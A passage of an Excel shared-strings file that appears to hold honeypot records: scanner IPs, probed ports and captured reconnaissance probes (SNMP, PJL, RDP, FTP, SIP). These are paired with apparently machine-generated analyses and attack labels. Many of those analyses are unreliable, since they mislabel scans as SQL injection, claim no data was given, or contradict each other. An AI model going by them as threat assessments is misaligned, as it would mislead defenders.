    <t>connection&amp;&amp;command&amp;&amp;query&amp;&amp;login&amp;&amp;request&amp;&amp;stshash&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.146.12.172:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'gloctaep', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.89;tag=gloctaep', 'max-forwards': '0', 'to': 'sip:193.57.138.110', 'via': 'SIP/2.0/UDP 185.247.137.89:5060;branch=z9hG4bKgloctaep;received=185.247.137.89;rport=53352'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.89,41629)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.89,43315)}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}</t>
  </si>
  <si>
    <t>::ffff:b9f7:8959</t>
  </si>
  <si>
    <t>There is no log data provided for analysis. &amp;&amp; This log data indicates that there is currently no available information regarding malicious activity, as indicated by "NA".</t>
  </si>
  <si>
    <t>I don't see any log data provided. Please provide the log data, and I'll analyze it for you.
Once I have the data, I can help identify the type of attack in a short phrase (max 2 words). &amp;&amp; FTP Scanning</t>
  </si>
  <si>
    <t>5142dbe84eaccd0ae97d62c2ace9c695</t>
  </si>
  <si>
    <t>117.207.181.143</t>
  </si>
  <si>
    <t>::ffff:75cf:b58f</t>
  </si>
  <si>
    <t>71a5e3f1ee3a51a4fd479919cd6a2528</t>
  </si>
  <si>
    <t>139.162.3.144</t>
  </si>
  <si>
    <t>NA&amp;&amp;prod54client01.academyforinternetresearch.org</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Email Spoofing&amp;&amp;Credential_Stuffing_Attack_High</t>
  </si>
  <si>
    <t>SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>110&amp;&amp;9100&amp;&amp;8443&amp;&amp;25&amp;&amp;NA&amp;&amp;3306&amp;&amp;80&amp;&amp;1433&amp;&amp;143&amp;&amp;443&amp;&amp;21&amp;&amp;23&amp;&amp;3389</t>
  </si>
  <si>
    <t>SG</t>
  </si>
  <si>
    <t>Singapore</t>
  </si>
  <si>
    <t>1880252</t>
  </si>
  <si>
    <t>1.35208</t>
  </si>
  <si>
    <t>103.82</t>
  </si>
  <si>
    <t>63949</t>
  </si>
  <si>
    <t>Akamai Technologies, Inc.</t>
  </si>
  <si>
    <t>LINODE</t>
  </si>
  <si>
    <t>Linode, LLC</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;command&amp;&amp;login&amp;&amp;GET</t>
  </si>
  <si>
    <t>{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': ''}}&amp;&amp;{Data_POP3:{'args': '/ RTSP/1.0', 'cmd': 'OPTIONS'}}&amp;&amp;{Data_RDP:NA}</t>
  </si>
  <si>
    <t>::ffff:8ba2:390</t>
  </si>
  <si>
    <t>The POP3 service was accessed, indicating an attempted unauthorized access to email accounts.
An attacker may be trying to steal sensitive information by accessing user emails.
This activity suggests potential identity theft or spamming attempts. &amp;&amp; This log indicates an unknown or malicious process attempting to execute PJL commands, potentially as part of a printer exploitation attempt. &amp;&amp; No activity detected for POP3 service, normal operation expected unless indicated otherwise. &amp;&amp; Unknown FTP login attempt was made from an unknown IP, suggesting potential unauthorized access or scanning activity. &amp;&amp; The data suggests an attempted connection or scan for the IMAP service, which could be a reconnaissance attempt by malicious actors to identify vulnerable services.
This activity may indicate someone is probing for potential entry points into the network.
It is likely an exploratory action. &amp;&amp; Possible FTP login attempts were made, but details are unavailable due to lack of data. The system detected unknown or unauthorized access attempts through an FTP service. Further investigation is required for a more detailed analysis. &amp;&amp; No incoming mail activity is detected, indicating possible absence or spoofing of a legitimate connection to an email service. This could be an attempt to bypass authentication or probing for vulnerability. Normal email service usage typically involves active connections and communication with the server. &amp;&amp; This log indicates a failed attempt to access a specific service, likely an intrusion or reconnaissance effort. The lack of success suggests the actor may have been probing for vulnerabilities rather than actively exploiting them. This behavior is characteristic of initial stages of a potential attack. &amp;&amp; A GET request was made to the root directory, which could be a reconnaissance attempt or probing for vulnerabilities. This type of activity is often seen as the first step in a larger malicious attack. It may indicate an attacker gathering information about the system's layout and potential entry points. &amp;&amp; A GET request is being made to the root directory of a secure server, potentially indicating reconnaissance or probing activity. This could be an attempt to gather information about the server's contents or configuration. The fact that it's a GET request suggests a non-destructive scan rather than an attack. &amp;&amp; No activity was detected on the SMTP service, suggesting that an attacker may have attempted to use this service but was unsuccessful or undetected. &amp;&amp; The log suggests that an attempt was made to access the SMTP service, but no malicious activity is indicated as the result of this attempt was null (NA). The attempt could be from a legitimate user trying to set up an account or a scanner probing for vulnerabilities. This event alone may not indicate malicious intent. &amp;&amp; No malicious activity reported yet. The log is empty, indicating no suspicious connections or attempts detected. This is expected since no data has been provided for analysis. &amp;&amp; No log data available, unable to determine malicious activity at this time. 
 Lack of data makes it impossible to analyze or confirm any suspicious behavior. 
This indicates that no malicious attempts have been detected so far. &amp;&amp; Unsuccessful attempt to connect to Microsoft SQL Server, possibly a brute-force attack or port scanning. Unknown username and password were used for authentication. No further action was taken by the system. &amp;&amp; This log suggests an attempt to access Microsoft SQL Server, which could be a brute force attack or unauthorized login attempt. The absence of credentials indicates the attacker may have been trying to exploit a vulnerability rather than use stolen login information. This type of activity is indicative of malicious intent to gain unauthorized access to sensitive data. &amp;&amp; Malicious actors are attempting to connect to an IMAP service but are being denied or unable to access it. The lack of activity or failed connections may indicate probing for vulnerabilities or reconnaissance efforts. This could be a precursor to more targeted attacks in the future. &amp;&amp; Possible brute-force attack attempt on IMAP service, with the goal of guessing credentials or gaining unauthorized access to email accounts. The absence of any authentication attempts or actions could indicate a reconnaissance or probing activity. This might be an initial step in a larger malicious campaign. &amp;&amp; A malicious actor is attempting to connect to a service, possibly to gain unauthorized access or steal sensitive information, using a spoofed user agent that mimics a legitimate browser. The request is for the root directory of the service which could be a reconnaissance attempt. &amp;&amp; An unknown user attempted to access the server's root directory using a GET request from an IP address that may be associated with malicious activity. The User-Agent field suggests the connection is coming from a Linux-based system, possibly attempting to mask its true identity. This could be a reconnaissance or initial probing attempt by a potential attacker. &amp;&amp; The data indicates an attempted access to Microsoft SQL Server, which is a common target for malicious activity. This could be an attempt to extract sensitive information or inject malware into the system. The lack of credentials suggests a brute-force attack. &amp;&amp; There is insufficient information available as there is no log data provided. &amp;&amp; There is no log data provided for analysis. &amp;&amp; An empty FTP command was received, which could indicate an attacker probing the system or attempting to exploit a vulnerability. This behavior is often seen in reconnaissance or scanning activities. It may be part of a larger malicious campaign. &amp;&amp; The data suggests a brute-force attempt against an FTP service, as there is no command provided but an empty argument list implies an automated login process. This could be an indication of password guessing or cracking attempts. The absence of a valid command indicates the attacker is likely attempting to log in rather than perform any other action. &amp;&amp; This is a GET request attempting to access a POP3 server, likely trying to exploit a vulnerability for malicious purposes such as spamming or stealing sensitive information. The request includes an HTTP header indicating it's coming from the internet. It appears to be a reconnaissance attempt to identify potential targets for further exploitation. &amp;&amp; Malicious activity detected: an unauthorized GET request was made to a POP3 server, possibly attempting to exploit it for email account access or other malicious purposes.
The request contains an unusual path ('/') and a blank line before the request, suggesting it may be a spoofed or automated attempt.
This could be indicative of an attacker scanning for vulnerable services. &amp;&amp; A user connected to the FTP service and issued a HELP command, which may be an attempt to gather information about available commands or functionality for malicious purposes. This could be an initial reconnaissance step in a larger attack scenario. The command is typically used by legitimate users but can also indicate potential probing behavior. &amp;&amp; The user is attempting to connect to the FTP service, and their first command is a legitimate request for help, which could be an initial scan or reconnaissance. This behavior may indicate a potential attacker probing for vulnerabilities or information disclosure. The use of HELP as the first command suggests a cautious approach by the user. &amp;&amp; Malicious actor is attempting an unauthorized access to a server by sending an HTTP GET request with unusual arguments, possibly trying to exploit a vulnerability or gather information about the system. The request appears to be coming from an unknown source and may be part of a larger reconnaissance activity. This could be indicative of a scanning or probing attempt. &amp;&amp; A GET request is being sent to a server with an unusual HTTP header, indicating possible exploitation of a vulnerability or scanning for weaknesses. The presence of single quotes and parentheses in the request suggests an attempt to inject malicious code. This may be part of a reconnaissance phase to identify vulnerable servers. &amp;&amp; Possible malicious activity: Scanning for potential vulnerabilities on POP3 service, possibly to identify exploitable weaknesses or test firewall rules. The attacker is using an OPTIONS request with an HTTP-style header, indicating a reconnaissance probe. This may be the first step in a larger attack. &amp;&amp; Possible login attempt without any arguments or commands, indicating a potential brute-force attack or reconnaissance. No actual command was executed, suggesting an initial probing activity. This could be the start of a larger malicious operation. &amp;&amp; Potential malicious activity detected: An unknown FTP command was issued, indicating possible probing or exploitation attempts to access unauthorized services.
The absence of a specified command suggests an attempt to exploit a vulnerability by sending an invalid or unexpected instruction.
This may be part of a reconnaissance phase to gather information about the available services. &amp;&amp; Possible malicious activity: An attempt was made to probe a service for potential vulnerabilities, specifically a RTSP server. The OPTIONS command is being used to test the capabilities of the service. This behavior suggests reconnaissance and potential exploitation. &amp;&amp; An unknown client attempted to query available features of a service, potentially reconnaissance or probing for vulnerabilities. This could be an attempt to gather information about the system's capabilities. The target service appears to be related to streaming media.</t>
  </si>
  <si>
    <t>SQL Injection &amp;&amp; SQL Attack &amp;&amp; Connection Spoofing &amp;&amp; Scanning Attack &amp;&amp; Port Scan &amp;&amp; FTP scan &amp;&amp; FTP Null Scan &amp;&amp; POP Scanning &amp;&amp; POP Scanning &amp;&amp; Port Scan &amp;&amp; Scanning Attempt &amp;&amp; Fake Login &amp;&amp; No Attack &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; Scanning Attack &amp;&amp; Scan Attack &amp;&amp; Scanning Attempt &amp;&amp; Scanning attempt &amp;&amp; Port Scan &amp;&amp; Port Scan &amp;&amp; FTP Bruteforce &amp;&amp; FTP Scan &amp;&amp; FTP Scan &amp;&amp; Scanning Probe &amp;&amp; None Given &amp;&amp; FTP Probe &amp;&amp; Port Scan &amp;&amp; Scanning Port</t>
  </si>
  <si>
    <t>311bcc8a96f0edfc3825e005adc84b71</t>
  </si>
  <si>
    <t>205.210.31.131</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MSSQL_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_POSTGRES_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SNMP_H18&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_SOCKS5_H20&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;3389&amp;&amp;1433&amp;&amp;5900&amp;&amp;445&amp;&amp;110&amp;&amp;3306&amp;&amp;21&amp;&amp;41980&amp;&amp;5432&amp;&amp;1521&amp;&amp;161&amp;&amp;54672&amp;&amp;9100&amp;&amp;51333&amp;&amp;23&amp;&amp;1080&amp;&amp;143&amp;&amp;6667&amp;&amp;54368&amp;&amp;6379&amp;&amp;NA</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=laNhFtvSW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XQAHWt'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_NTP:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f83</t>
  </si>
  <si>
    <t>770788748390f8c51849d712bd54d4d8</t>
  </si>
  <si>
    <t>165.154.150.65</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_SMTP_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;45770&amp;&amp;10014&amp;&amp;25&amp;&amp;3306&amp;&amp;1521&amp;&amp;6379&amp;&amp;9100&amp;&amp;NA&amp;&amp;35035&amp;&amp;161&amp;&amp;389&amp;&amp;23&amp;&amp;5432&amp;&amp;110&amp;&amp;143&amp;&amp;5900&amp;&amp;445&amp;&amp;45050</t>
  </si>
  <si>
    <t>-6.20876</t>
  </si>
  <si>
    <t>106.846</t>
  </si>
  <si>
    <t>135377</t>
  </si>
  <si>
    <t>UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED</t>
  </si>
  <si>
    <t>Ucloud Information Technology (hk) Limited</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;query&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'TLRMTVNTUAABAAAAB4IIOAAAAAAAAAAAAAAAAAAAAAA=', 'data': 'None'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POP3:{'args': 'NTLM', 'cmd': 'AUTH'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.150.65,58026)}&amp;&amp;{Data_SMB:Incoming connection (165.154.150.65,34538)}&amp;&amp;{Data_SMB:Incoming connection (165.154.150.65,44502)}</t>
  </si>
  <si>
    <t>::ffff:a59a:9641</t>
  </si>
  <si>
    <t>58d267148d2167fea0394438ff1113ce</t>
  </si>
  <si>
    <t>185.226.197.45</t>
  </si>
  <si>
    <t>zl-ams-nl-gp1-wk130d.internet-census.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_LDAP_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;41552&amp;&amp;161&amp;&amp;53&amp;&amp;38195&amp;&amp;6379&amp;&amp;22527&amp;&amp;5432&amp;&amp;1521&amp;&amp;3306&amp;&amp;110&amp;&amp;6667&amp;&amp;389&amp;&amp;21&amp;&amp;443&amp;&amp;9100&amp;&amp;143&amp;&amp;48774&amp;&amp;5900</t>
  </si>
  <si>
    <t>ICG 4 ZEN AMS</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;query&amp;&amp;command&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.113.33:9100_x000D_
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'MKKL0'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.226.197.45;rport=46534'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.226.197.45;rport=33378'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LCGM0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_NTP:NA}</t>
  </si>
  <si>
    <t>::ffff:b9e2:c52d</t>
  </si>
  <si>
    <t>The system was accessed using VNC, indicating unauthorized access may have occurred. The lack of "Data_VNC" value suggests an attempt to connect but no valid credentials were provided or activity was detected. This could be a reconnaissance attempt by a malicious actor. &amp;&amp; The lack of VNC (Virtual Network Computing) connection attempt data suggests that there was no malicious activity detected via this service, but it's possible that the service was never accessed or monitored. However, it could also indicate a missed or blocked connection attempt, worth further investigation to confirm the absence of malicious activity. &amp;&amp; Unknown service attempted connection, potentially malicious login attempt detected. Possible brute-force attack or unauthorized access attempt occurred. Activity may indicate an attempted exploitation of a system vulnerability. &amp;&amp; There is no log data provided, so I have nothing to analyze or report on. &amp;&amp; Malicious activity detected, attempting to access Oracle database credentials. Unsuccessful login attempt with Oracle database related information provided. Indicates potential SQL injection or brute force attack attempt. &amp;&amp; The data suggests that an NTP service is being accessed, possibly for synchronization or to exploit vulnerabilities in the service. The fact that no data was received indicates either a legitimate request or a malicious attempt to gather information. An attacker might be probing the system's clock settings. &amp;&amp; No attempt made to synchronize time with server, possible time manipulation or probing for vulnerable NTP services. 
Indicates potential scanning of system clock synchronization mechanisms. 
May be reconnaissance activity before attempting other malicious actions. &amp;&amp; No log data provided, unable to analyze or describe any malicious activity.</t>
  </si>
  <si>
    <t>VNC Attack &amp;&amp; VNC Attack</t>
  </si>
  <si>
    <t>5107431801f854d2ef63cd2fc1202851</t>
  </si>
  <si>
    <t>154.212.141.145</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_POSTGRES_H7&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_MSSQL_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;3389&amp;&amp;NA&amp;&amp;25&amp;&amp;143&amp;&amp;5432&amp;&amp;1433&amp;&amp;23&amp;&amp;110&amp;&amp;443&amp;&amp;9100&amp;&amp;8443&amp;&amp;21&amp;&amp;445&amp;&amp;80</t>
  </si>
  <si>
    <t>9465</t>
  </si>
  <si>
    <t>AGOTOZ PTE. LTD.</t>
  </si>
  <si>
    <t>Agotoz HK Limited</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.145;rport=55697'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 45.14.244.111:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
